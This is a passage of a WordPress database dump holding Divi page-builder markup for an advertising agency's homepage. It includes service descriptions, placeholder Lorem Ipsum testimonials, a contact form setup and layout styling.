custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" title_text=\"home-office-07-1\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-05 07:38:55','2020-08-05 07:38:55','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/05/134-revision-v1/',0,'revision','',0),(431,1,'2020-08-05 07:39:48','2020-08-05 07:39:48','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" 